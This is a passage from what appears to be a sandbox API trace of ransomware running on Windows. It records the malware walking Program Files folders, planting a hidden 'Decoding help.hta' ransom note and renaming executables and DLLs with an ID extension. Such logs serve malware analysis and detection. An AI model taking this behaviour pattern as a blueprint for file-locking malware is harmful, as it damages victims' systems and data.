lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8f318ba, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8f318ba, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa8f318ba, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19200, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpshare.exe", cAlternateFileName="")) returned 1 [0039.810] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.810] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.811] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpshare.exe") returned -1 [0039.811] lstrlenW (lpString="wmpshare.exe") returned 12 [0039.811] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="wmpshare.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe" [0039.811] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe" [0039.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe" (normalized: "c:\\program files\\windows media player\\wmpshare.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\wmpshare.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpshare.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.811] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x639ff2e2, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x639ff2e2, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xfe2737f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x28800, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPSideShowGadget.exe", cAlternateFileName="")) returned 1 [0039.811] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" [0039.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\decoding help.hta")) returned 0x1 [0039.811] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPSideShowGadget.exe") returned -1 [0039.811] lstrlenW (lpString="WMPSideShowGadget.exe") returned 21 [0039.811] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.811] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="WMPSideShowGadget.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe" [0039.811] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe" [0039.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe" (normalized: "c:\\program files\\windows media player\\wmpsideshowgadget.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\WMPSideShowGadget.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\wmpsideshowgadget.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.819] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x639ff2e2, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x639ff2e2, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0xfe2737f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x28800, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPSideShowGadget.exe", cAlternateFileName="")) returned 0 [0039.820] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 95 os_tid = 0xbb0 [0039.702] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows NT\\*.*", lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a55f0 [0039.702] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.702] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.702] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.702] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.702] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0039.703] lstrcmpW (lpString1=".", lpString2="Accessories") returned -1 [0039.703] lstrcmpW (lpString1="..", lpString2="Accessories") returned -1 [0039.703] lstrcmpiW (lpString1="windows", lpString2="Accessories") returned 1 [0039.704] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\*.*" [0039.705] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\*.*") returned 35 [0039.705] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\", lpString2="Accessories" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories" [0039.705] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\Accessories\\*.*" [0039.705] GlobalMemoryStatus (in: lpBuffer=0x930fd10 | out: lpBuffer=0x930fd10) [0039.705] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10970868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x210 [0039.716] CloseHandle (hObject=0x210) returned 1 [0039.716] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 1 [0039.716] lstrcmpW (lpString1=".", lpString2="TableTextService") returned -1 [0039.716] lstrcmpW (lpString1="..", lpString2="TableTextService") returned -1 [0039.716] lstrcmpiW (lpString1="windows", lpString2="TableTextService") returned 1 [0039.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows NT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\*.*" [0039.718] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows NT\\*.*") returned 35 [0039.718] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\", lpString2="TableTextService" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService" [0039.718] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*") returned="\\\\?\\C:\\Program Files\\Windows NT\\TableTextService\\*.*" [0039.718] GlobalMemoryStatus (in: lpBuffer=0x930fd10 | out: lpBuffer=0x930fd10) [0039.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109a0938, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x210 [0039.729] CloseHandle (hObject=0x210) returned 1 [0039.729] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService", cAlternateFileName="TABLET~1")) returned 0 [0039.729] FindClose (in: hFindFile=0x5a55f0 | out: hFindFile=0x5a55f0) returned 1 Thread: id = 96 os_tid = 0xbb4 [0039.714] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*", lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5630 [0039.728] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.728] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.728] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.728] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.728] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.728] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.728] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.728] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.728] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.728] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.728] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US" [0039.728] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" [0039.729] GlobalMemoryStatus (in: lpBuffer=0x9c4fd10 | out: lpBuffer=0x9c4fd10) [0039.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93280b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x21c [0039.756] CloseHandle (hObject=0x21c) returned 1 [0039.756] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea0f40f, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8ea0f40f, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x85cc42cd, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x16f18, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe", cAlternateFileName="")) returned 1 [0039.756] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.756] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.756] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" [0039.756] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\decoding help.hta")) returned 0xffffffff [0039.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0039.757] WriteFile (in: hFile=0x21c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x9c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x9c4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.758] CloseHandle (hObject=0x21c) returned 1 [0039.758] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.758] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ImagingDevices.exe") returned -1 [0039.758] lstrlenW (lpString="ImagingDevices.exe") returned 18 [0039.758] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.758] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.758] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="ImagingDevices.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe" [0039.758] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe" [0039.758] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.758] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe" (normalized: "c:\\program files\\windows photo viewer\\imagingdevices.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows photo viewer\\imagingdevices.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.770] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1054327, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1054327, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1184e2a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x25e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingEngine.dll", cAlternateFileName="")) returned 1 [0039.770] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" [0039.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\decoding help.hta")) returned 0x1 [0039.770] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ImagingEngine.dll") returned -1 [0039.770] lstrlenW (lpString="ImagingEngine.dll") returned 17 [0039.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="ImagingEngine.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll" [0039.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll" [0039.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll" (normalized: "c:\\program files\\windows photo viewer\\imagingengine.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\ImagingEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows photo viewer\\imagingengine.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.770] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb102e1c7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb102e1c7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1054327, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll", cAlternateFileName="")) returned 1 [0039.771] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" [0039.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\decoding help.hta")) returned 0x1 [0039.771] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoAcq.dll") returned -1 [0039.771] lstrlenW (lpString="PhotoAcq.dll") returned 12 [0039.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*" [0039.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\*.*") returned 45 [0039.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\", lpString2="PhotoAcq.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll" [0039.771] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll" [0039.771] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll" (normalized: "c:\\program files\\windows photo viewer\\photoacq.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows photo viewer\\photoacq.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.771] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b623846, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8b623846, 